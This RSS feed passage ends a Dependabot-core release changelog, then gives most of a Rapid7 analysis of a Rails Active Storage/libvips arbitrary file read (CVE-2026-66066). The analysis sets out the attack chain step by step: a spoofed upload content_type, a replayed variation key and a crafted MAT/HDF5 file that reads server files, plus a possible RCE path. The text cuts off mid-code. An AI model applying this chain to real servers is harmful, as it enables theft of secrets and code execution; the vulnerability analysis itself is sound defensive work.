<li>Preserve original absence of the bundler self-checksum on lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p-linnane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p-linnane">@p-linnane</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4965338727" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15669" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15669/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15669">#15669</a></li>
<li>Support security updates for vcpkg ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4973992221" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15676" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15676/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15676">#15676</a></li>
<li>Beta support of PNPM 11 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-robaiken">@v-robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5000216141" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15710" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15710/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15710">#15710</a></li>
<li>Remove <code>enable_cooldown_default_days</code> feature flag; make 3-day cooldown default unconditional by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-robaiken">@v-robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5002011381" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15711" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15711/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15711">#15711</a></li>
<li>github_actions: integrate gh-actions-lock lockfile relocking by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nodeselector/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nodeselector">@nodeselector</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628570489" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15267" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15267/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15267">#15267</a></li>
<li>Fix npm ignoring scoped registry issue by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4985039138" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15692" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15692/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15692">#15692</a></li>
<li>Fix Gradle lockfile updates for repos with in-repo convention plugins by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4974380596" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15677" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15677/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15677">#15677</a></li>
<li>Bump pytest from 9.0.3 to 9.1.1 in /python/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4981366582" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15687" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15687/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15687">#15687</a></li>
<li>Feature flag clean up by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-robaiken">@v-robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5021264672" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15724" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15724/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15724">#15724</a></li>
<li>Bump pip-tools from 7.5.3 to 7.6.0 in /python/helpers in the pip-tools group across 1 directory by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4981366186" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15686" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15686/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15686">#15686</a></li>
<li>Respect resolutions/overrides and pin Berry wildcard updates to fix spurious NoChangeError by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4991784564" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15701" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15701/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15701">#15701</a></li>
<li>Revert "Respect resolutions/overrides and pin Berry wildcard updates to fix spurious NoChangeError" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5024244888" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15730" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15730/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15730">#15730</a></li>
<li>Type npm_and_yarn requirement access by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4996467217" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15706" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15706/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15706">#15706</a></li>
<li>Compare full path, not file name, when excluding fetched files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timdawborn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timdawborn">@timdawborn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4994888952" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15703" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15703/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15703">#15703</a></li>
<li>Type bun requirement access by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4996467712" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15707" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15707/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15707">#15707</a></li>
<li>Type bundler requirement access by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4996468199" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15708" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15708/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15708">#15708</a></li>
<li>Stop retrying client errors when recording cooldown telemetry by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5031766385" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15737" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15737/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15737">#15737</a></li>
<li>Bump cython from 3.2.4 to 3.2.9 in /python/helpers in the common group across 1 directory by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4981365773" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15685" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15685/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15685">#15685</a></li>
<li>Stop pinning the resolved js-yaml version in sub-dependency specs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5033839896" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15744" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15744/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15744">#15744</a></li>
<li>Preserve .NET SDK prerelease version strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/theinfosecguy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/theinfosecguy">@theinfosecguy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5037992818" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15746" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15746/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15746">#15746</a></li>
<li>Bump library/rust from 1.97.0-bookworm to 1.97.1-bookworm in /cargo by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4981365177" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15682" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15682/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15682">#15682</a></li>
<li>Bump the prod-dependencies group across 2 directories with 22 updates by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4905870992" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15605" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15605/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15605">#15605</a></li>
<li>v0.390.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5045635337" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15752" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15752/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15752">#15752</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-robaiken">@v-robaiken</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5000216141" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15710" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15710/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15710">#15710</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nodeselector/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nodeselector">@nodeselector</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628570489" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15267" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15267/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15267">#15267</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timdawborn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timdawborn">@timdawborn</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4994888952" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15703" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15703/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15703">#15703</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/theinfosecguy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/theinfosecguy">@theinfosecguy</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5037992818" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15746" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15746/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15746">#15746</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.389.0...v0.390.0">v0.389.0...v0.390.0</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 Analysis: KindaRails2Shell (CVE-2026-66066)]]></title>
<description><![CDATA[OverviewOn July 29, 2026, the Ruby on Rails project published a security advisory for CVE-2026-66066, an arbitrary file read in Active Storage applications that use the Vips image processor with untrusted uploads. The affected Active Storage ranges are < 7.2.3.2, >= 8.0, < 8.0.5.1, and >= 8.1, < ...]]></description>
<link>https://tsecurity.de/de/3701273/it-security-nachrichten/rapid7-analysis-kindarails2shell-cve-2026-66066/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701273/it-security-nachrichten/rapid7-analysis-kindarails2shell-cve-2026-66066/</guid>
<pubDate>Mon, 03 Aug 2026 20:18:47 +0200</pubDate>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 29, 2026, the Ruby on Rails project published a </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span>security advisory</span></a><span> for </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-66066/"><span>CVE-2026-66066</span></a><span>, an arbitrary file read in Active Storage applications that use the Vips image processor with untrusted uploads. The affected Active Storage ranges are </span><span><span data-type="inlineCode">&lt; 7.2.3.2</span></span><span>, </span><span><span data-type="inlineCode">&gt;= 8.0, &lt; 8.0.5.1</span></span><span>, and </span><span><span data-type="inlineCode">&gt;= 8.1, &lt; 8.1.3.1</span></span><span>. Vips is the default Active Storage variant processor for applications that load Rails 7.0 or later defaults. Rails 6 applications are affected only when they explicitly configure Vips.</span></p><p></p><p><span>Our </span><a href="https://www.rapid7.com/blog/post/etr-kindarails2shell-cve-2026-66066-critical-arbitrary-file-read-and-possible-remote-code-execution-in-ruby-on-rails/"><span>Emergent Threat Response blog</span></a><span> covers the affected versions, mitigation guidance, and current exploitation status. This post traces the request from the direct-upload endpoint to the HDF5 read, then shows how the arbitrary file read can expose Rails signing material and become code execution. </span><span><strong>A vulnerable application can disclose arbitrary files before the attacker has recovered a Rails secret or forged a token.</strong></span><span> A genuine Active Storage </span><span><span data-type="inlineCode">variation_key</span></span><span> from the same application, paired with a direct-upload blob whose stored </span><span><span data-type="inlineCode">content_type</span></span><span> claims to be an image, is enough to reach a libvips loader that turns a crafted MAT/HDF5 file into an arbitrary file-read oracle.</span></p><p></p><p><span>We reproduced the published chain against Rails </span><span><span data-type="inlineCode">6.0.6.1</span></span><span>, </span><span><span data-type="inlineCode">6.1.7.10</span></span><span>, </span><span><span data-type="inlineCode">7.2.3.1</span></span><span>, </span><span><span data-type="inlineCode">8.0.5</span></span><span>, and </span><span><span data-type="inlineCode">8.1.3</span></span><span>, and confirmed that patched </span><span><span data-type="inlineCode">7.2.3.2</span></span><span>, </span><span><span data-type="inlineCode">8.0.5.1</span></span><span>, and </span><span><span data-type="inlineCode">8.1.3.1</span></span><span> targets block the crafted representation. We also validated a remote code execution (RCE) path that uses only JSON-compatible </span><span><span data-type="inlineCode">Hash</span></span><span>, </span><span><span data-type="inlineCode">Array</span></span><span>, and </span><span><span data-type="inlineCode">String</span></span><span> values in a signed variation. That path reaches </span><span><span data-type="inlineCode">Kernel#spawn</span></span><span> or </span><span><span data-type="inlineCode">Kernel#eval</span></span><span> through ImageProcessing's chain builder, and it worked when Rails was configured with </span><span><span data-type="inlineCode">config.active_support.message_serializer = :json</span></span><span>.</span></p><p></p><p><span>The advisory covers the vulnerable Active Storage configuration. The MAT/HDF5 representation chain shown here has narrower requirements. The deployed libvips build must expose </span><span><span data-type="inlineCode">matload</span></span><span> with MAT 7.3/HDF5 support, the application must preserve an attacker-supplied </span><span><span data-type="inlineCode">content_type</span></span><span>, and the attacker must be able to trigger a representation, for example with a genuine variation key. Those requirements narrow where this particular chain works, but the underlying issue is that Active Storage handed untrusted uploads to libvips operations that libvips already marked unsafe for untrusted content.</span></p><p></p><p><span>The attack can be summarized as follows:</span></p><p><span></span></p><pre language="shell-session">[Attacker]
   |
   | 1. Creates a direct-upload blob with content_type = image/png
   v
[Rails stores the blob as an image without examining the bytes]
   |
   | 2. Reuses a genuine variation_key from the same application
   v
[Rails accepts the blob as variable and starts a representation]
   |
   | 3. image_processing hands the local tempfile path to libvips
   v
[libvips matload]
   |
   | 4. Bytes 0-9 match "MATLAB 5.0"
   v
[libmatio]
   |
   | 5. Bytes 124-125 contain MAT_FT_MAT73 (0x0200)
   v
[HDF5 external storage]
   |
   | 6. Dataset bytes come from attacker-chosen path + offset
   v
[Rendered PNG representation]
   |
   --&gt; Target file bytes are returned as image pixels</pre><h2>Analysis</h2><p><span>The published chain contains two separate trust failures. Rails decides that a blob is an image from a database value, while libvips decides what parser to use from the bytes on disk. Once the file reaches </span><span><span data-type="inlineCode">matload</span></span><span>, libvips and libmatio disagree again about the same MAT header. libvips only looks at the first ten bytes, while libmatio selects the MAT version from bytes 124 and 125.</span></p><h3><span>Direct upload stores an attacker-controlled type</span></h3><p><span>The standard direct-upload endpoint creates the blob record before the service receives the file. In Rails </span><span><span data-type="inlineCode">8.0.5</span></span><span>, </span><span><span data-type="inlineCode">ActiveStorage::DirectUploadsController#create</span></span><span> accepts </span><span><span data-type="inlineCode">content_type</span></span><span> directly from the request and passes it into </span><span><span data-type="inlineCode">create_before_direct_upload!</span></span><span>:</span></p><p></p><pre language="ruby">class ActiveStorage::DirectUploadsController &lt; ActiveStorage::BaseController
  def create
    blob = ActiveStorage::Blob.create_before_direct_upload!(**blob_args) # &lt;-- [1]
    render json: direct_upload_json(blob)
  end

  private
    def blob_args
      params.expect(blob: [:filename, :byte_size, :checksum, :content_type, metadata: {}]).to_h.symbolize_keys # &lt;-- [2]
    end</pre><pre language="ruby">    def create_before_direct_upload!(key: nil, filename:, byte_size:, checksum:, content_type: nil, metadata: nil, service_name: nil, record: nil)
      metadata = filter_metadata(metadata)
      create! key: key, filename: filename, byte_size: byte_size, checksum: checksum, content_type: content_type, metadata: metadata, service_name: service_name # &lt;-- [3]
    end</pre><p><span></span></p><p><span>At </span><span><span data-type="inlineCode">[1]</span></span><span> and </span><span><span data-type="inlineCode">[2]</span></span><span>, the endpoint accepts </span><span><span data-type="inlineCode">content_type</span></span><span> from the client. At </span><span><span data-type="inlineCode">[3]</span></span><span>, Active Storage writes that value directly to the blob record. The direct-upload path never runs the server-side </span><span><span data-type="inlineCode">unfurl</span></span><span> flow that would identify the bytes with Marcel. When we uploaded the same crafted file through a normal multipart attachment in the lab, Rails re-identified it as MATLAB data before variant processing, so it did not pass the image gate.</span></p><p></p><p><span>Once the direct-upload blob exists, </span><span><span data-type="inlineCode">Blob#variable?</span></span><span> uses only the stored database value to decide whether the blob can be transformed. On the representation path, no built-in previewer accepts </span><span><span data-type="inlineCode">image/png</span></span><span>, so the blob falls through to </span><span><span data-type="inlineCode">variant</span></span><span>:</span></p><p></p><pre language="ruby">  def variant(transformations)
    if variable?
      variant_class.new(self, ActiveStorage::Variation.wrap(transformations).default_to(default_variant_transformations))
    else
      raise ActiveStorage::InvariableError, "Can't transform blob with ID=#{id} and content_type=#{content_type}"
    end
  end

  # Returns true if the variant processor can transform the blob (its content
  # type is in +ActiveStorage.variable_content_types+).
  def variable?
    ActiveStorage.variable_content_types.include?(content_type) # &lt;-- [4]
  end</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[4]</span></span><span>, Rails performs a set-membership check against the stored </span><span><span data-type="inlineCode">content_type</span></span><span>. No file bytes are examined. A crafted MAT/HDF5 object stored as </span><span><span data-type="inlineCode">image/png</span></span><span> reaches the image variant pipeline.</span></p><h3><span>A genuine variation key can be replayed against another blob</span></h3><p><span>The standard representation route accepts a signed blob ID and a signed variation key as separate parameters. Rails resolves them independently:</span></p><p></p><pre language="ruby">module ActiveStorage::SetBlob # :nodoc:
  extend ActiveSupport::Concern

  included do
    before_action :set_blob
  end

  private
    def set_blob
      @blob = blob_scope.find_signed!(params[:signed_blob_id] || params[:signed_id]) # &lt;-- [5]
    rescue ActiveSupport::MessageVerifier::InvalidSignature
      head :not_found
    end

    def blob_scope
      ActiveStorage::Blob
    end
end</pre><pre language="ruby">class ActiveStorage::Representations::BaseController &lt; ActiveStorage::BaseController # :nodoc:
  include ActiveStorage::SetBlob

  before_action :set_representation

  private
    def blob_scope
      ActiveStorage::Blob.scope_for_strict_loading
    end

    def set_representation
      @representation = @blob.representation(params[:variation_key]).processed # &lt;-- [6]
    rescue ActiveSupport::MessageVerifier::InvalidSignature
      head :not_found
    end
end</pre><pre language="ruby">    # Returns a Variation instance with the transformations that were encoded by +encode+.
    def decode(key)
      new ActiveStorage.verifier.verify(key, purpose: :variation) # &lt;-- [7]
    end</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[5]</span></span><span>, Rails verifies the blob ID. At </span><span><span data-type="inlineCode">[6]</span></span><span> and </span><span><span data-type="inlineCode">[7]</span></span><span>, it separately verifies the variation key and applies it to that blob. There is no cross-check between the two signed values. An attacker can copy a </span><span><span data-type="inlineCode">variation_key</span></span><span> from any representation URL emitted by the same application and replay it against the signed ID of a newly created direct-upload blob. The file-read stage does not require </span><span><span data-type="inlineCode">secret_key_base</span></span><span>.</span></p><h3><span>The Vips pipeline leaves decoder selection to libvips</span></h3><p><span>Active Storage then hands the tempfile path to image_processing. The </span><span><span data-type="inlineCode">loader(page: 0)</span></span><span> call below can be misleading. It stores options for whichever loader libvips chooses later rather than choosing a loader itself:</span></p><p><span></span></p><pre language="ruby">        def process(file, format:)
          processor.
            source(file).
            loader(page: 0). # &lt;-- [8]
            convert(format).
            apply(operations). # &lt;-- [9]
            call
        end

        def processor
          ImageProcessing.const_get(ActiveStorage.variant_processor.to_s.camelize)
        end

        def operations
          transformations.each_with_object([]) do |(name, argument), list|
            if ActiveStorage.variant_processor == :mini_magick
              validate_transformation(name, argument) # &lt;-- [10]
            end

            if name.to_s == "combine_options"
              raise ArgumentError, &lt;&lt;~ERROR.squish
                Active Storage's ImageProcessing transformer doesn't support :combine_options,
                as it always generates a single command.
              ERROR
            end

            if argument.present?
              list &lt;&lt; [ name, argument ] # &lt;-- [11]
            end
          end
        end</pre><p><span></span></p><p><span>At </span><span><span data-type="inlineCode">[8]</span></span><span>, no decoder has been named yet. At </span><span><span data-type="inlineCode">[9]</span></span><span>, Rails forwards the signed transformation list into image_processing. For RCE, </span><span><span data-type="inlineCode">[10]</span></span><span> and </span><span><span data-type="inlineCode">[11]</span></span><span> matter because </span><span><span data-type="inlineCode">:mini_magick</span></span><span> transformations pass through </span><span><span data-type="inlineCode">validate_transformation</span></span><span>, while Vips transformations do not receive the same method-name validation.</span></p><p></p><p><span>In image_processing </span><span><span data-type="inlineCode">1.14.0</span></span><span>, the path later reaches </span><span><span data-type="inlineCode">Vips::Image.new_from_file</span></span><span>:</span></p><p><span></span></p><pre language="ruby">      def self.load_image(path_or_image, loader: nil, autorot: true, **options)
        if path_or_image.is_a?(::Vips::Image)
          image = path_or_image
        else
          path = path_or_image

          if loader
            image = ::Vips::Image.public_send(:"#{loader}load", path, **options)
          else
            options = Utils.select_valid_loader_options(path, options)
            image = ::Vips::Image.new_from_file(path, **options) # &lt;-- [12]
          end
        end

        image = image.autorot if autorot &amp;&amp; !options.key?(:autorotate)
        image
      end</pre><p></p><p><span>Because </span><span><span data-type="inlineCode">loader:</span></span><span> remains </span><span><span data-type="inlineCode">nil</span></span><span>, </span><span><span data-type="inlineCode">[12]</span></span><span> leaves decoder selection to libvips's file sniffers.</span></p><h3><span>libvips and libmatio disagree about the MAT header</span></h3><p><span>In libvips </span><span><span data-type="inlineCode">8.16.1</span></span><span>, </span><span><span data-type="inlineCode">matload</span></span><span> is marked as untrusted. Vulnerable Active Storage releases did not block untrusted operations before processing attacker-controlled uploads:</span></p><p><span></span></p><pre language="c">static void
vips_foreign_load_mat_class_init(VipsForeignLoadMatClass *class)
{
	/* ... omitted: class initialization ... */

	operation_class-&gt;flags |= VIPS_OPERATION_UNTRUSTED; // &lt;-- [13]

	foreign_class-&gt;suffs = vips__mat_suffs;

	load_class-&gt;is_a = vips__mat_ismat; // &lt;-- [14]</pre><p></p><p><span>The entire libvips MAT sniffer is a ten-byte prefix check:</span></p><p><span></span></p><pre language="c">int
vips__mat_ismat(const char *filename)
{
	unsigned char buf[15];

	if (vips__get_bytes(filename, buf, 10) == 10 &amp;&amp;
		vips_isprefix("MATLAB 5.0", (char *) buf)) // &lt;-- [15]
		return 1;

	return 0;
}</pre><p><span></span></p><p><span>At </span><span><span data-type="inlineCode">[13]</span></span><span>, libvips marks </span><span><span data-type="inlineCode">matload</span></span><span> as untrusted. At </span><span><span data-type="inlineCode">[14]</span></span><span>, it registers </span><span><span data-type="inlineCode">vips__mat_ismat</span></span><span> as the loader's sniffer. At </span><span><span data-type="inlineCode">[15]</span></span><span>, a file only needs to begin with </span><span><span data-type="inlineCode">MATLAB 5.0</span></span><span> for libvips to select </span><span><span data-type="inlineCode">matload</span></span><span>. A genuine MAT 7.3 file begins with </span><span><span data-type="inlineCode">MATLAB 7.3 MAT-file</span></span><span>, so it fails this check.</span></p><p></p><p><span>In libmatio </span><span><span data-type="inlineCode">1.5.28</span></span><span>, the descriptive text is not the format selector. libmatio reads the fixed version field at bytes 124 and 125:</span></p><p></p><pre language="c">enum mat_ft
{
    MAT_FT_MAT73 = 0x0200, /**&lt; @brief Matlab version 7.3 file */ // &lt;-- [16]
    MAT_FT_MAT5 = 0x0100,  /**&lt; @brief Matlab version 5 file   */
    MAT_FT_MAT4 = 0x0010,  /**&lt; @brief Matlab version 4 file   */
    MAT_FT_UNDEFINED = 0   /**&lt; @brief Undefined version       */
};</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[16]</span></span><span>, libmatio defines </span><span><span data-type="inlineCode">0x0200</span></span><span> as the MAT 7.3 format identifier.</span></p><p></p><pre language="c">Mat_Open(const char *matname, int mode)
{
    FILE *fp = NULL;
    mat_int16_t tmp, tmp2;
    mat_t *mat = NULL;
    size_t bytesread = 0;

    /* ... omitted: file opening and allocation ... */

    bytesread += fread(mat-&gt;header, 1, 116, fp);
    mat-&gt;header[116] = '\0';
    bytesread += fread(mat-&gt;subsys_offset, 1, 8, fp);
    bytesread += 2 * fread(&amp;tmp2, 2, 1, fp);
